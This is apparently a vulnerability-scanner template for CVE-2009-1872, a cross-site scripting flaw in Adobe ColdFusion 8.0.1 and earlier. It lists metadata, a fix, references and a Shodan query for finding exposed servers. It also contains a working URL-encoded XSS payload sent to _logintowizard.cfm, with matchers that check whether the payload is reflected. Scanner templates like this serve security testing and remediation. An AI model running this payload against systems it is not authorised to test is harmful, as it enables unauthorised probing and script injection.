51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2009-1872
|
|
|
|
info:
|
|
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
|
|
author: princechaddha
|
|
severity: medium
|
|
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
|
remediation: |
|
|
Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
|
|
reference:
|
|
- https://www.tenable.com/cve/CVE-2009-1872
|
|
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
|
|
- http://www.dsecrg.com/pages/vul/show.php?id=122
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2009-1872
|
|
cwe-id: CWE-79
|
|
epss-score: 0.3657
|
|
epss-percentile: 0.96635
|
|
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: adobe
|
|
product: coldfusion
|
|
shodan-query: http.component:"Adobe ColdFusion"
|
|
tags: cve,cve2009,adobe,xss,coldfusion,tenable
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|